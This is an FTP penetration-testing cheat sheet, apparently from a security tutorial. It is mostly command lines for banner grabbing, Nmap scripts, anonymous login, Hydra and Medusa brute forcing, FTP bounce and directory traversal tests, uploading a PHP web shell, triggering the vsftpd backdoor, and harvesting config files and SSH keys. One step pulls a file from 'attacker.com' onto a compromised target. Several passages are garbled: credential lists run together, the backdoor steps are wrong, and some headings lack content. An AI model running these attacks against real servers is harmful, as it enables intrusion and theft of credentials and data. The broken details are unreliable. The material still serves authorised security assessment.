FTP penetration testing guide covering anonymous login testing, brute force attacks, banner grabbing, and file transfer exploitation using tools like Nmap, Hydra, and Netcat for security assessments and ethical hacking.
FTP (File Transfer Protocol) runs on port 21 and is commonly used for file transfers. FTP servers often contain misconfigurations, default credentials, or vulnerabilities that can lead to unauthorized access and data exposure.
Netcat:
nc $RHOST 21
echo "QUIT" | nc $RHOST 21
Telnet:
telnet $RHOST 21
Banner extraction:
timeout 3 nc $RHOST 21 2>/dev/null
Nmap service scan:
nmap -sV -p 21 $RHOST
nmap -sC -sV -p 21 $RHOST
Default safe scripts:
nmap --script "ftp-* and safe" -p 21 $RHOST
All FTP scripts:
nmap --script ftp-* -p 21 $RHOST
Common enumeration scripts:
nmap --script ftp-anon,ftp-bounce,ftp-syst -p 21 $RHOST
Vulnerability detection:
nmap --script ftp-vuln-* -p 21 $RHOST
Many FTP servers allow anonymous access with username anonymous or ftp and any password (often anonymous@, empty, or email).
ftp $RHOST
# Username: anonymous
# Password: anonymous@ (or empty)
Nmap:
nmap --script ftp-anon -p 21 $RHOST
Metasploit:
msfconsole
use auxiliary/scanner/ftp/anonymous
set RHOSTS $RHOST
run
Once connected with anonymous access:
# List files
ls -la
# Download file
get filename.txt
# Upload file (if allowed)
put test.txt
# Change directory
cd /pub
# Check current directory
pwd
# Check system info
syst
Common default FTP credentials to test:
Common combinations:
admin:adminadministrator:passwordftp:ftpuser:userroot:rootguest:guesttest:test
Vendor-specific defaults:
ftp:ftp (if anonymous enabled)ftp:ftpHydra:
hydra -L users.txt -P passwords.txt ftp://$RHOST
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$RHOST
Ncrack:
ncrack -p 21 -U users.txt -P passwords.txt $RHOST
Medusa:
medusa -h $RHOST -u admin -P passwords.txt -M ftp
# Interactive mode
ftp $RHOST
# Command line mode
ftp -n $RHOST << EOF
user username password
binary
get file.txt
quit
EOF
# Passive mode (for firewall traversal)
passive
# Active vs Passive mode
passive on # Passive mode (default in most clients)
passive off # Active mode
# File transfer type
ascii # Text files
binary # Binary files (images, executables)
# Directory operations
ls -la # List files
cd /path # Change directory
pwd # Print working directory
mkdir dirname # Create directory
rmdir dirname # Remove directory
# File operations
get filename # Download file
mget *.txt # Download multiple files
put filename # Upload file
mput *.txt # Upload multiple files
delete filename # Delete file
mdelete *.txt # Delete multiple files
rename old new # Rename file
# System information
syst # System type
stat # Server status
help # List commands
Exploit FTP servers that allow connections to arbitrary hosts (rare in modern servers).
# Test for bounce capability
ftp $RHOST
# After login:
quote PORT 127,0,0,1,0,80
quote LIST
Nmap bounce scan:
nmap -b $RHOST -p 21,80
Note: Modern FTP servers typically disable bounce attacks by default. This vulnerability is rare.
Some FTP servers reveal whether usernames exist through different error messages.
# Try invalid password with real username
ftp $RHOST
Username: admin
Password: invalidpass
Compare error messages:
Test for directory traversal vulnerabilities:
ftp $RHOST
cd ../../../
pwd
ls -la
Test SSL/TLS configuration:
openssl s_client -connect $RHOST:21 -starttls ftp
nmap --script ssl-* -p 21 $RHOST
Using ftp client:
ftp $RHOST
binary
get config.txt
mget *.conf
Using wget:
wget ftp://user:pass@$RHOST/file.txt
wget --ftp-user=user --ftp-password=pass ftp://$RHOST/file.txt
wget -r ftp://user:pass@$RHOST/
Using curl:
curl ftp://user:pass@$RHOST/file.txt -o output.txt
curl ftp://user:pass@$RHOST/ -l
Using ftp client:
ftp $RHOST
binary
put shell.php
put /path/to/local/file.txt remote/file.txt
Using curl:
curl -T file.txt ftp://user:pass@$RHOST/
curl -T file.txt ftp://user:pass@$RHOST/uploads/file.txt
Download entire directory:
wget -r ftp://user:pass@$RHOST/path/
Mirror directory:
wget -m ftp://user:pass@$RHOST/
FTP uses two modes for data connections:
Test passive mode:
ftp $RHOST
passive
ls
Test active mode:
ftp $RHOST
passive off
ls
Version detection:
nmap -sV -p 21 $RHOST | grep vsftpd
Known vulnerabilities:
Check for backdoor:
echo 'USER test:)'
echo 'PASS test'
# Wait 6200 seconds for shell on port 6200
nc $RHOST 6200
Version detection:
nmap -sV -p 21 $RHOST | grep ProFTPd
Mod_copy vulnerability (CVE-2015-3306):
# Test for mod_copy module
# Allows copying files without proper authorization
Version detection:
nmap -sV -p 21 $RHOST | grep FileZilla
Via wget from target:
# If you have web shell or RCE
wget --ftp-user=user --ftp-password=pass ftp://attacker.com/file.txt
Common files to look for:
config.php, .env, web.config)*.bak, *.backup, *.old)access.log, error.log)*.db, *.sql)id_rsa, id_dsa)\
ftp $RHOST
# Search for common files
mget *.conf
mget *.bak
mget *.log